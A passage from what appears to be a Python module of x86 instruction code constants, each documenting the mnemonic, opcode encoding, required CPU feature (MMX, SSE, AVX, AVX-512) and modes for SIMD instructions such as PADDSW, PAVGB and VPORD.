``VPADDUSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG DD /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDUSW_YMM_YMM_YMMM256: int = 2306
"""
``VPADDUSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG DD /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDUSW_XMM_K1Z_XMM_XMMM128: int = 2307
"""
``VPADDUSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG DD /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDUSW_YMM_K1Z_YMM_YMMM256: int = 2308
"""
``VPADDUSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG DD /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDUSW_ZMM_K1Z_ZMM_ZMMM512: int = 2309
"""
``VPADDUSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG DD /r``
``AVX512BW``
``16/32/64-bit``
"""
PMAXUB_MM_MMM64: int = 2310
"""
``PMAXUB mm1, mm2/m64``
``NP 0F DE /r``
``SSE``
``16/32/64-bit``
"""
PMAXUB_XMM_XMMM128: int = 2311
"""
``PMAXUB xmm1, xmm2/m128``
``66 0F DE /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMAXUB_XMM_XMM_XMMM128: int = 2312
"""
``VPMAXUB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG DE /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMAXUB_YMM_YMM_YMMM256: int = 2313
"""
``VPMAXUB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG DE /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMAXUB_XMM_K1Z_XMM_XMMM128: int = 2314
"""
``VPMAXUB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG DE /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXUB_YMM_K1Z_YMM_YMMM256: int = 2315
"""
``VPMAXUB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG DE /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXUB_ZMM_K1Z_ZMM_ZMMM512: int = 2316
"""
``VPMAXUB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG DE /r``
``AVX512BW``
``16/32/64-bit``
"""
PANDN_MM_MMM64: int = 2317
"""
``PANDN mm, mm/m64``
``NP 0F DF /r``
``MMX``
``16/32/64-bit``
"""
PANDN_XMM_XMMM128: int = 2318
"""
``PANDN xmm1, xmm2/m128``
``66 0F DF /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPANDN_XMM_XMM_XMMM128: int = 2319
"""
``VPANDN xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG DF /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPANDN_YMM_YMM_YMMM256: int = 2320
"""
``VPANDN ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG DF /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPANDND_XMM_K1Z_XMM_XMMM128B32: int = 2321
"""
``VPANDND xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 DF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDND_YMM_K1Z_YMM_YMMM256B32: int = 2322
"""
``VPANDND ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 DF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDND_ZMM_K1Z_ZMM_ZMMM512B32: int = 2323
"""
``VPANDND zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 DF /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDNQ_XMM_K1Z_XMM_XMMM128B64: int = 2324
"""
``VPANDNQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 DF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDNQ_YMM_K1Z_YMM_YMMM256B64: int = 2325
"""
``VPANDNQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 DF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDNQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2326
"""
``VPANDNQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 DF /r``
``AVX512F``
``16/32/64-bit``
"""
PAVGB_MM_MMM64: int = 2327
"""
``PAVGB mm1, mm2/m64``
``NP 0F E0 /r``
``SSE``
``16/32/64-bit``
"""
PAVGB_XMM_XMMM128: int = 2328
"""
``PAVGB xmm1, xmm2/m128``
``66 0F E0 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPAVGB_XMM_XMM_XMMM128: int = 2329
"""
``VPAVGB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E0 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPAVGB_YMM_YMM_YMMM256: int = 2330
"""
``VPAVGB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG E0 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPAVGB_XMM_K1Z_XMM_XMMM128: int = 2331
"""
``VPAVGB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E0 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPAVGB_YMM_K1Z_YMM_YMMM256: int = 2332
"""
``VPAVGB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG E0 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPAVGB_ZMM_K1Z_ZMM_ZMMM512: int = 2333
"""
``VPAVGB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG E0 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSRAW_MM_MMM64: int = 2334
"""
``PSRAW mm, mm/m64``
``NP 0F E1 /r``
``MMX``
``16/32/64-bit``
"""
PSRAW_XMM_XMMM128: int = 2335
"""
``PSRAW xmm1, xmm2/m128``
``66 0F E1 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRAW_XMM_XMM_XMMM128: int = 2336
"""
``VPSRAW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E1 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRAW_YMM_YMM_XMMM128: int = 2337
"""
``VPSRAW ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG E1 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRAW_XMM_K1Z_XMM_XMMM128: int = 2338
"""
``VPSRAW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E1 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAW_YMM_K1Z_YMM_XMMM128: int = 2339
"""
``VPSRAW ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.WIG E1 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAW_ZMM_K1Z_ZMM_XMMM128: int = 2340
"""
``VPSRAW zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.WIG E1 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSRAD_MM_MMM64: int = 2341
"""
``PSRAD mm, mm/m64``
``NP 0F E2 /r``
``MMX``
``16/32/64-bit``
"""
PSRAD_XMM_XMMM128: int = 2342
"""
``PSRAD xmm1, xmm2/m128``
``66 0F E2 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRAD_XMM_XMM_XMMM128: int = 2343
"""
``VPSRAD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E2 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRAD_YMM_YMM_XMMM128: int = 2344
"""
``VPSRAD ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG E2 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRAD_XMM_K1Z_XMM_XMMM128: int = 2345
"""
``VPSRAD xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.W0 E2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAD_YMM_K1Z_YMM_XMMM128: int = 2346
"""
``VPSRAD ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.W0 E2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAD_ZMM_K1Z_ZMM_XMMM128: int = 2347
"""
``VPSRAD zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.W0 E2 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAQ_XMM_K1Z_XMM_XMMM128: int = 2348
"""
``VPSRAQ xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.W1 E2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAQ_YMM_K1Z_YMM_XMMM128: int = 2349
"""
``VPSRAQ ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.W1 E2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAQ_ZMM_K1Z_ZMM_XMMM128: int = 2350
"""
``VPSRAQ zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.W1 E2 /r``
``AVX512F``
``16/32/64-bit``
"""
PAVGW_MM_MMM64: int = 2351
"""
``PAVGW mm1, mm2/m64``
``NP 0F E3 /r``
``SSE``
``16/32/64-bit``
"""
PAVGW_XMM_XMMM128: int = 2352
"""
``PAVGW xmm1, xmm2/m128``
``66 0F E3 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPAVGW_XMM_XMM_XMMM128: int = 2353
"""
``VPAVGW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E3 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPAVGW_YMM_YMM_YMMM256: int = 2354
"""
``VPAVGW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG E3 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPAVGW_XMM_K1Z_XMM_XMMM128: int = 2355
"""
``VPAVGW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E3 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPAVGW_YMM_K1Z_YMM_YMMM256: int = 2356
"""
``VPAVGW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG E3 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPAVGW_ZMM_K1Z_ZMM_ZMMM512: int = 2357
"""
``VPAVGW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG E3 /r``
``AVX512BW``
``16/32/64-bit``
"""
PMULHUW_MM_MMM64: int = 2358
"""
``PMULHUW mm1, mm2/m64``
``NP 0F E4 /r``
``SSE``
``16/32/64-bit``
"""
PMULHUW_XMM_XMMM128: int = 2359
"""
``PMULHUW xmm1, xmm2/m128``
``66 0F E4 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMULHUW_XMM_XMM_XMMM128: int = 2360
"""
``VPMULHUW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E4 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULHUW_YMM_YMM_YMMM256: int = 2361
"""
``VPMULHUW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG E4 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULHUW_XMM_K1Z_XMM_XMMM128: int = 2362
"""
``VPMULHUW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E4 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULHUW_YMM_K1Z_YMM_YMMM256: int = 2363
"""
``VPMULHUW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG E4 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULHUW_ZMM_K1Z_ZMM_ZMMM512: int = 2364
"""
``VPMULHUW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG E4 /r``
``AVX512BW``
``16/32/64-bit``
"""
PMULHW_MM_MMM64: int = 2365
"""
``PMULHW mm, mm/m64``
``NP 0F E5 /r``
``MMX``
``16/32/64-bit``
"""
PMULHW_XMM_XMMM128: int = 2366
"""
``PMULHW xmm1, xmm2/m128``
``66 0F E5 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMULHW_XMM_XMM_XMMM128: int = 2367
"""
``VPMULHW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E5 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULHW_YMM_YMM_YMMM256: int = 2368
"""
``VPMULHW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG E5 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULHW_XMM_K1Z_XMM_XMMM128: int = 2369
"""
``VPMULHW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E5 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULHW_YMM_K1Z_YMM_YMMM256: int = 2370
"""
``VPMULHW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG E5 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULHW_ZMM_K1Z_ZMM_ZMMM512: int = 2371
"""
``VPMULHW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG E5 /r``
``AVX512BW``
``16/32/64-bit``
"""
CVTTPD2DQ_XMM_XMMM128: int = 2372
"""
``CVTTPD2DQ xmm1, xmm2/m128``
``66 0F E6 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTTPD2DQ_XMM_XMMM128: int = 2373
"""
``VCVTTPD2DQ xmm1, xmm2/m128``
``VEX.128.66.0F.WIG E6 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTTPD2DQ_XMM_YMMM256: int = 2374
"""
``VCVTTPD2DQ xmm1, ymm2/m256``
``VEX.256.66.0F.WIG E6 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTTPD2DQ_XMM_K1Z_XMMM128B64: int = 2375
"""
``VCVTTPD2DQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 E6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPD2DQ_XMM_K1Z_YMMM256B64: int = 2376
"""
``VCVTTPD2DQ xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 E6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPD2DQ_YMM_K1Z_ZMMM512B64_SAE: int = 2377
"""
``VCVTTPD2DQ ymm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F.W1 E6 /r``
``AVX512F``
``16/32/64-bit``
"""
CVTDQ2PD_XMM_XMMM64: int = 2378
"""
``CVTDQ2PD xmm1, xmm2/m64``
``F3 0F E6 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTDQ2PD_XMM_XMMM64: int = 2379
"""
``VCVTDQ2PD xmm1, xmm2/m64``
``VEX.128.F3.0F.WIG E6 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTDQ2PD_YMM_XMMM128: int = 2380
"""
``VCVTDQ2PD ymm1, xmm2/m128``
``VEX.256.F3.0F.WIG E6 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PD_XMM_K1Z_XMMM64B32: int = 2381
"""
``VCVTDQ2PD xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.F3.0F.W0 E6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PD_YMM_K1Z_XMMM128B32: int = 2382
"""
``VCVTDQ2PD ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.F3.0F.W0 E6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PD_ZMM_K1Z_YMMM256B32_ER: int = 2383
"""
``VCVTDQ2PD zmm1 {k1}{z}, ymm2/m256/m32bcst{er}``
``EVEX.512.F3.0F.W0 E6 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PD_XMM_K1Z_XMMM128B64: int = 2384
"""
``VCVTQQ2PD xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.F3.0F.W1 E6 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PD_YMM_K1Z_YMMM256B64: int = 2385
"""
``VCVTQQ2PD ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.F3.0F.W1 E6 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PD_ZMM_K1Z_ZMMM512B64_ER: int = 2386
"""
``VCVTQQ2PD zmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.F3.0F.W1 E6 /r``
``AVX512DQ``
``16/32/64-bit``
"""
CVTPD2DQ_XMM_XMMM128: int = 2387
"""
``CVTPD2DQ xmm1, xmm2/m128``
``F2 0F E6 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTPD2DQ_XMM_XMMM128: int = 2388
"""
``VCVTPD2DQ xmm1, xmm2/m128``
``VEX.128.F2.0F.WIG E6 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTPD2DQ_XMM_YMMM256: int = 2389
"""
``VCVTPD2DQ xmm1, ymm2/m256``
``VEX.256.F2.0F.WIG E6 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTPD2DQ_XMM_K1Z_XMMM128B64: int = 2390
"""
``VCVTPD2DQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.F2.0F.W1 E6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2DQ_XMM_K1Z_YMMM256B64: int = 2391
"""
``VCVTPD2DQ xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.F2.0F.W1 E6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2DQ_YMM_K1Z_ZMMM512B64_ER: int = 2392
"""
``VCVTPD2DQ ymm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.F2.0F.W1 E6 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVNTQ_M64_MM: int = 2393
"""
``MOVNTQ m64, mm``
``NP 0F E7 /r``
``SSE``
``16/32/64-bit``
"""
MOVNTDQ_M128_XMM: int = 2394
"""
``MOVNTDQ m128, xmm1``
``66 0F E7 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVNTDQ_M128_XMM: int = 2395
"""
``VMOVNTDQ m128, xmm1``
``VEX.128.66.0F.WIG E7 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVNTDQ_M256_YMM: int = 2396
"""
``VMOVNTDQ m256, ymm1``
``VEX.256.66.0F.WIG E7 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVNTDQ_M128_XMM: int = 2397
"""
``VMOVNTDQ m128, xmm1``
``EVEX.128.66.0F.W0 E7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTDQ_M256_YMM: int = 2398
"""
``VMOVNTDQ m256, ymm1``
``EVEX.256.66.0F.W0 E7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTDQ_M512_ZMM: int = 2399
"""
``VMOVNTDQ m512, zmm1``
``EVEX.512.66.0F.W0 E7 /r``
``AVX512F``
``16/32/64-bit``
"""
PSUBSB_MM_MMM64: int = 2400
"""
``PSUBSB mm, mm/m64``
``NP 0F E8 /r``
``MMX``
``16/32/64-bit``
"""
PSUBSB_XMM_XMMM128: int = 2401
"""
``PSUBSB xmm1, xmm2/m128``
``66 0F E8 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBSB_XMM_XMM_XMMM128: int = 2402
"""
``VPSUBSB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E8 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBSB_YMM_YMM_YMMM256: int = 2403
"""
``VPSUBSB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG E8 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBSB_XMM_K1Z_XMM_XMMM128: int = 2404
"""
``VPSUBSB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E8 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBSB_YMM_K1Z_YMM_YMMM256: int = 2405
"""
``VPSUBSB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG E8 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBSB_ZMM_K1Z_ZMM_ZMMM512: int = 2406
"""
``VPSUBSB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG E8 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSUBSW_MM_MMM64: int = 2407
"""
``PSUBSW mm, mm/m64``
``NP 0F E9 /r``
``MMX``
``16/32/64-bit``
"""
PSUBSW_XMM_XMMM128: int = 2408
"""
``PSUBSW xmm1, xmm2/m128``
``66 0F E9 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBSW_XMM_XMM_XMMM128: int = 2409
"""
``VPSUBSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E9 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBSW_YMM_YMM_YMMM256: int = 2410
"""
``VPSUBSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG E9 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBSW_XMM_K1Z_XMM_XMMM128: int = 2411
"""
``VPSUBSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E9 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBSW_YMM_K1Z_YMM_YMMM256: int = 2412
"""
``VPSUBSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG E9 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBSW_ZMM_K1Z_ZMM_ZMMM512: int = 2413
"""
``VPSUBSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG E9 /r``
``AVX512BW``
``16/32/64-bit``
"""
PMINSW_MM_MMM64: int = 2414
"""
``PMINSW mm1, mm2/m64``
``NP 0F EA /r``
``SSE``
``16/32/64-bit``
"""
PMINSW_XMM_XMMM128: int = 2415
"""
``PMINSW xmm1, xmm2/m128``
``66 0F EA /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMINSW_XMM_XMM_XMMM128: int = 2416
"""
``VPMINSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG EA /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMINSW_YMM_YMM_YMMM256: int = 2417
"""
``VPMINSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG EA /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMINSW_XMM_K1Z_XMM_XMMM128: int = 2418
"""
``VPMINSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG EA /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINSW_YMM_K1Z_YMM_YMMM256: int = 2419
"""
``VPMINSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG EA /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINSW_ZMM_K1Z_ZMM_ZMMM512: int = 2420
"""
``VPMINSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG EA /r``
``AVX512BW``
``16/32/64-bit``
"""
POR_MM_MMM64: int = 2421
"""
``POR mm, mm/m64``
``NP 0F EB /r``
``MMX``
``16/32/64-bit``
"""
POR_XMM_XMMM128: int = 2422
"""
``POR xmm1, xmm2/m128``
``66 0F EB /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPOR_XMM_XMM_XMMM128: int = 2423
"""
``VPOR xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG EB /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPOR_YMM_YMM_YMMM256: int = 2424
"""
``VPOR ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG EB /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPORD_XMM_K1Z_XMM_XMMM128B32: int = 2425
"""
``VPORD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 EB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPORD_YMM_K1Z_YMM_YMMM256B32: int = 2426
"""
``VPORD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 EB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPORD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2427
"""
``VPORD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 EB /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPORQ_XMM_K1Z_XMM_XMMM128B64: int = 2428
"""
``VPORQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 EB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPORQ_YMM_K1Z_YMM_YMMM256B64: int = 2429
"""
``VPORQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 EB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPORQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2430
"""
``VPORQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 EB /r``
``AVX512F``
``16/32/64-bit``
"""
PADDSB_MM_MMM64: int = 2431
"""
``PADDSB mm, mm/m64``
``NP 0F EC /r``
``MMX``
``16/32/64-bit``
"""
PADDSB_XMM_XMMM128: int = 2432
"""
``PADDSB xmm1, xmm2/m128``
``66 0F EC /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDSB_XMM_XMM_XMMM128: int = 2433
"""
``VPADDSB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG EC /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDSB_YMM_YMM_YMMM256: int = 2434
"""
``VPADDSB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG EC /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDSB_XMM_K1Z_XMM_XMMM128: int = 2435
"""
``VPADDSB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG EC /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDSB_YMM_K1Z_YMM_YMMM256: int = 2436
"""
``VPADDSB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG EC /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDSB_ZMM_K1Z_ZMM_ZMMM512: int = 2437
"""
``VPADDSB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG EC /r``
``AVX512BW``
``16/32/64-bit``
"""
PADDSW_MM_MMM64: int = 2438
"""
``PADDSW mm, mm/m64``
``NP 0F ED /r``
``MMX``
``16/32/64-bit``
"""
PADDSW_XMM_XMMM128: int = 2439
"""
``PADDSW xmm1, xmm2/m128``
``66 0F ED /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDSW_XMM_XMM_XMMM128: int = 2440
"""
``VPADDSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG ED /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDSW_YMM_YMM_YMMM256: int = 2441
"""
``VPADDSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG ED /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDSW_XMM_K1Z_XMM_XMMM128: int = 2442
"""
``VPADDSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG ED /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDSW_YMM_K1Z_YMM_YMMM256: int = 2443
"""
``VPADDSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG ED /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
